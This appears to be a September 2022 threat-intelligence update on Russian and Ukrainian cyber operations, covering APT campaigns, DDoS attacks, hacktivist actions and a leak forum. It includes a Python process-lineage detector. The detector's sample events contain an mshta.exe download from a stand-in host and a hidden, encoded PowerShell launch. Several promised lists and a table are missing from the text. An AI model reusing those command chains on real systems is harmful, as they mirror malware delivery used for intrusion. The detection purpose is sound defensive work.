September 29, 2022
As the Russian and Ukrainian war continues, cybercriminals in support of both sides continue to target organizations to obtain sensitive data, disrupt operations and wreak havoc. What’s more, Russia has used the conflict to move their targeting beyond Ukraine.
This war has had a rippling effect across the world, including a cybercriminal landscape that’s also been affected as groups split, turn sides and announce support for one country or the other. Since the invasion began, Optiv’s Global Threat Intelligence Center (gTIC) has provided periodic updates on Russian and Ukrainian military actions and estimated cyber-related implications in advisories and blog posts on February 4, February 22, February 24, June 30 and August 25. In this update, we’ll provide information on the events of the previous 30 days and what to expect looking forward.
Russia has consistently targeted Ukraine with cyberattacks since well before the physical invasion in February 2022. One infamous attack targeted Ukraine’s power grid on December 23, 2015: the attackers took control of the facilities’ SCADA systems and opened breakers at 30 distribution substations, causing more than 200,000 consumers to lose power.1 Since the invasion of Ukraine, Russia’s cyberattacks against Ukraine have increased significantly, as have those of Russian supporters, including both state-supported and cybercriminal groups that have pledged their allegiance to the Kremlin.
In August 2022, the Computer Emergency Response Team of Ukraine (CERT-UA) confirmed an ongoing cyberespionage campaign conducted by the Russia-linked Gamaredon APT group (aka Shuckworm, Primitive Bear, Armageddon). The group has been observed targeting Ukrainian entities with a PowerShell info-stealer malware dubbed GammaLoad. This campaign is reported to have started on July 15 and was detected as recently as August 8, 2022. The attackers started with spear-phishing messages leading to a self-extracting 7-zip file, which was downloaded via the system’s default browser. The attackers then used mshta.exe to download an XML file, which was likely masquerading as an HTML application file (see Table 1 below). After the XML file was downloaded onto victim networks, the attackers executed a PowerShell stealer. In some cases, the attackers also delivered two backdoors named Giddome and Pterodo, which are known to be used by the Gamaredon group.2
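The execution chain described above (self-extracting archive run from a download folder, mshta.exe fetching remote content, PowerShell spawned from mshta.exe) can be expressed as process-lineage detection rules. The following is an added example written for this update, not code from Optiv’s gTIC or CERT-UA. The event field names (pid, ppid, image, cmdline) and the sample events are assumptions constructed for the example; real telemetry such as Sysmon Event ID 1 would need its fields mapped onto them.

```python
"""Process-lineage detection for an archive -> mshta.exe -> PowerShell chain.

Added example; the event schema and the events below are constructed, not
captured telemetry.
"""
import re

URL_RE = re.compile(r"https?://", re.IGNORECASE)
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Path fragments where a user-downloaded archive payload typically lands.
USER_WRITABLE = ("\\downloads\\", "\\temp\\", "\\appdata\\")

# Constructed sample process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 900, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 1000, "ppid": 900, "image": r"C:\Program Files\Browser\browser.exe", "cmdline": '"browser.exe"'},
    # Self-extracting archive executed from the browser's download folder.
    {"pid": 1100, "ppid": 1000, "image": r"C:\Users\alice\Downloads\report.exe", "cmdline": '"report.exe"'},
    # mshta.exe launched by the archive payload with a remote URL argument.
    {"pid": 1200, "ppid": 1100, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe http://example.invalid/index.xml"},
    # PowerShell spawned by mshta.exe; the encoded argument is deliberately omitted.
    {"pid": 1300, "ppid": 1200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -enc <omitted>"},
    # Benign activity: mshta.exe on a local file from explorer, PowerShell from cmd.
    {"pid": 2000, "ppid": 900, "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe C:\Tools\helpdesk.hta"},
    {"pid": 2050, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 2100, "ppid": 2050, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
]


def image_name(path):
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


def from_user_writable(event):
    """True if the process image lives under a user-writable location."""
    return any(frag in event["image"].lower() for frag in USER_WRITABLE)


def ancestors(event, index, depth=4):
    """Return the parent, grandparent, ... events of `event`, up to `depth` levels."""
    out, cur = [], event
    for _ in range(depth):
        cur = index.get(cur["ppid"])
        if cur is None:
            break
        out.append(cur)
    return out


def detect(events):
    """Return (rule_name, pid) findings, in event order."""
    index = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        parent = index.get(e["ppid"])
        if name in SCRIPT_HOSTS and URL_RE.search(e["cmdline"]):
            findings.append(("script_host_remote_content", e["pid"]))
        if name in SCRIPT_HOSTS and parent is not None and from_user_writable(parent):
            findings.append(("script_host_from_user_writable_parent", e["pid"]))
        if name == "powershell.exe" and parent is not None and image_name(parent["image"]) in SCRIPT_HOSTS:
            findings.append(("powershell_from_script_host", e["pid"]))
        if name == "powershell.exe" and any(from_user_writable(a) for a in ancestors(e, index)):
            findings.append(("powershell_lineage_user_writable", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

The rules deliberately key on lineage rather than on the file name of the downloaded archive, since the archive name changes per campaign while the mshta.exe-to-PowerShell relationship does not; the benign events show that a locally sourced HTA and a PowerShell session started from cmd.exe produce no findings.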
In August 2022, the Microsoft Threat Intelligence Center (MSTIC) observed and took actions to disrupt campaigns launched by the Russia-linked APT group SEABORGIUM. SEABORGIUM is a highly persistent threat actor that targets the same organizations over long periods of time using constant impersonation, rapport building and phishing to slowly deepen their intrusion. SEABORGIUM intrusions have been linked to hacking and leak campaigns where stolen and leaked data is used to shape narratives in targeted countries. Since the beginning of 2022, MSTIC has observed SEABORGIUM campaigns targeting over 30 organizations in NATO countries, particularly the U.S., U.K. and the government sector of Ukraine. SEABORGIUM primarily focuses operations on defense and intelligence consulting companies, non-governmental and intergovernmental organizations, think tanks and higher education.
SEABORGIUM conducts reconnaissance on its target individuals before beginning a campaign and focuses on identifying legitimate contacts in the target’s social network. The threat actors Likely leverage social media platforms, personal directories and open-source intelligence (OSINT) to identify targets’ contacts that can be used for impersonation. Once the group has a contact, it creates an email address that matches the contact and sends a phishing email. If the target is a personal or consumer target, the threat actor typically begins with a benign email that includes pleasantries, Likely to establish rapport and avoid suspicion. When the victim is an organization, the emails take a more authoritative approach. The goal of these campaigns is to steal sensitive information and harvest credentials.
In August 2022, Mandiant reported that the Russia-linked group APT29 (aka Cozy Bear) has been vigorously targeting Microsoft 365 accounts in NATO countries and attempting to access foreign policy information. Victims have included accounts that APT29 compromised months or even years before. APT29 used multiple new techniques during these attacks:
In August 2022, Latvia’s Computer Emergency Response Team (CERT.LV) reported that their website was suffering a massive DDoS attack. Latvia attributed the attack to the Russia-linked hacker group Killnet, after Latvia’s parliament announced Russia as a “state sponsor of terrorism.” In May 2022, Killnet declared war against any country that allied with Ukraine during the war, which has included the U.S., the U.K., Germany, Italy, Latvia, Romania, Lithuania, Estonia and Poland. These countries have been targeted each time they announce support for Ukraine, with Latvia and Lithuania targeted the most often. Latvia’s head of CERT.LV stated that Latvia is attacked by hackers almost on a daily basis with around 1,000 targets on some days.5 Finland’s parliament was also targeted by Russia-linked hackers, a group called NoName057(16), in August 2022. The hackers stated on their Telegram channel that they “punished” Finland for its aspiration to join NATO. The cyberattack on Finland’s parliament occurred on the same day U.S. President Joe Biden announced his support for Finland and Sweden to join NATO.6
There are multiple threat groups, including the IT Army of Ukraine and Anonymous, that have pledged to help Ukraine in the cyberwar that has ensued. These groups are made up of threat actors from all areas of the world who have come together to support the country. The IT Army of Ukraine was created on February 26, 2022, after the ground invasion of Ukraine, and is made up of more than 1,000 Ukrainian and foreign volunteers. Additionally, after the invasion of Ukraine, the Anonymous hacking group posted on Twitter calling for hackers around the world to target Russia, effectively declaring war on Russia in an operation dubbed #OpRussia.
In August 2022, Ukrainian hackers hijacked television broadcasts in Russian-occupied Crimea and aired an address by President Volodymyr Zelenskyy. The address was broadcast on Russia’s Pervyi Kanal (Channel One).7
In August 2022, the Anonymous hacking group announced via Twitter that two Russian video conferencing services were under attack. The group announced that all services were down. The first, Webinar Group, is used for meetings, online events, training and webinars throughout Russia. The second, Videomost, is another of the top video conferencing apps used throughout Russia for meetings, trainings and online events.
On September 06, 2022, Anonymous TV (@YourAnonTV) posted on their Twitter that the IT Army of Ukraine successfully targeted the third largest bank in the Russian Federation, GazpromBank, with a purported DDoS attack. The post stated that the website was down for four hours, making it impossible to send payments and transfers and blocking access to personal accounts and mobile banking. The post included two screenshots that showed the application as unavailable.8
In September 2022, the IT Army of Ukraine targeted the Yandex Taxi app, causing a major traffic backup in Moscow. The group ordered all available taxis to the same location in Moscow, creating a traffic jam in the center of the city on September 01, 2022. Due to the hack, one of Moscow’s main streets was completely blocked for more than two hours. The Yandex-owned company stated that its security department immediately blocked the intruder and halted the fake taxi requests.9 This incident highlights how even low-complexity, simple cyberattacks can result in real-world economic and social disruption and impact.
In August 2022, the Russian streaming company START confirmed that the personal information of its customers was leaked during a cyberattack. The company did not disclose how many customers were affected, but the incident was listed on the Russian Telegram channel Information Leaks, which stated the leak comprised 72GB of data for 44 million customers. The leaked information included usernames, email addresses, hashed passwords, IP addresses, country of registration, subscription start and end dates and the last login to the service. The breach purportedly affects viewers from Russia, Kazakhstan, China and Ukraine. The hacking group announced that the data came from an exposed MongoDB database. START announced it had fixed the vulnerability that allowed the data breach to occur.10
In August 2022, a forum specializing in cyberattacks against Russia and Belarus, DUMPS, appeared and was observed advertising DDoS attacks starting at $80 per hour. The forum only targets organizations in Russia and Belarus and does not offer any services against other countries. The activity centers around data leaks, advertised DDoS attack services, forged and stolen identity documents, and anonymous and bulletproof hosting services. The data-leaks section of the forum appears to be the largest; there, users share data stolen from Russia-based government and private institutions. DUMPS prices its offerings by the power of the DDoS attack, with a lower-level “layer four” assault lasting one day priced at $500 and a higher “level seven” attack over one day priced at $600. Shorter attacks are offered by the hour. DUMPS appears to support its Ukrainian users while attracting Russian users who are willing to take up cyber-arms against their own country. The site has yet to gain much notoriety, with just 100 users, but could grow significantly if it gains attention.
In September 2022, unknown hackers reportedly started flooding Cobalt Strike servers operated by former members of the Conti ransomware group with anti-Russian messages to disrupt their activity. Although the Conti ransomware group shut down its internal infrastructure in May 2022, its members shifted to other ransomware groups, such as Quantum, Hive and Alphv. The former Conti members have continued to use the same Cobalt Strike infrastructure to conduct new attacks under the other ransomware operations. The threat actor flooding the servers is using the username “Stop Putin!” on multiple computers and changing the computer names to various messages – “Stop the war!”, “15000+ dead Russian soldiers!” and “Be a Russian patriot!”. The messages are flooding the servers at a rate of about two every second, overloading the TeamServer’s Java application and disrupting activity in a manner similar to a DoS condition. The threat actors are unknown; however, they have been observed resuming the flooding each time a new server believed to be connected to the former Conti members is identified.11
In September 2022, the Cyber Department of the Ukrainian Security Service (SSU) dismantled two bot farms that spread Russian disinformation on social networks and messaging platforms via thousands of fake accounts. The bot army comprised nearly 7,000 accounts and was used to push content discrediting the defense forces of Ukraine, justifying Russia’s armed aggression and destabilizing Ukraine’s social and political situation. One of the farms was operated by a 24-year-old native living in the Kyiv region and was used by “representatives of the PR departments of political parties and Russian citizens promoting destructive and provocative material in Ukrainian information space.” The second farm was operated by a user from Odessa and spread panic in the region by pushing disinformation and fake news from the front, selling its services to Russian “clients.” Ukraine has dismantled farms comprising more than one million bots since the beginning of the war in February 2022.12
In September 2022, it was reported that the Ukrainian military made advances which Likely led Russia to order the withdrawal of its troops from occupied Kharkiv Oblast west of the Oskil River. Additionally, it was reported that in the south, near Kherson, Russia was Likely struggling to bring sufficient reserves forward across the Dnipro River to the front line. The Ukrainian successes reported over the previous 30 days will Likely have significant implications for Russia’s overall operations on the ground. Due to this factor, it is Likely that Russia-based and supporting threat groups will increase their attacks on Ukrainian government and military organizations, as well as those of countries in support of Russia, over the next 30 days.13
Along with the physical conflict in Russia’s invasion of Ukraine, it’s Likely that cyber adversaries, regardless of attribution, will continue to leverage and employ techniques, tools and vulnerabilities used in previous cyberattacks and campaigns. Threat actors are Likely to target known vulnerabilities, including older (2+ years) vulnerabilities, in widely used software and services to gain access to victim networks. This is Likely because the same techniques continue to yield successful compromises while requiring minimal resources, as open-source and commercially available tools, software and malware can be reused.
In addition to multiple vulnerabilities, Optiv’s gTIC assesses it is Likely that cybercriminals and fringe state-sponsored campaigns will use common software and malware in the coming months, such as:
Table 1: Commonly observed MITRE ATT&CK tactics
It’s Likely that the U.S. and other Western Coalition countries will remain attractive targets for Russia-based threat actors for financial gain and espionage attacks. It’s Likely that if the United States imposes harsher and broader sanctions and embargoes on Russia, the fallout will result in nearly all ransomware groups being placed under severe restrictions through the U.S. Treasury’s Office of Foreign Asset Control (OFAC). This would leave ransomware victims in the U.S. unable to consider negotiations and payments in exchange for preventing data leaks and retrieving decryption keys for compromised files and systems. Other countries with a history of state-sponsored and/or APT attacks that have indirectly aligned with Russia or maintained a suspicious neutrality toward it, such as China and India, could also pose additional risks or serve as proxies for cyberattacks.
When Russia invaded Ukraine, U.S.-based organizations began pulling their businesses from Russia. Multiple ransomware groups, including REvil, Conti and LockBit 2.0/3.0, are based in Russia and target multiple U.S.-based organizations daily. The sophistication and technical knowledge of the ransomware groups, the NotPetya attacks and nation-state groups – such as APT28, APT29 and Sandworm – highlight Russia’s ability to create severe disruption and chaos in the United States. U.S.-based organizations are a historically attractive target and it’s Likely that U.S. companies will continue to be targeted, whether by threat actors based in Russia or those in support of the Kremlin’s invasion of Ukraine.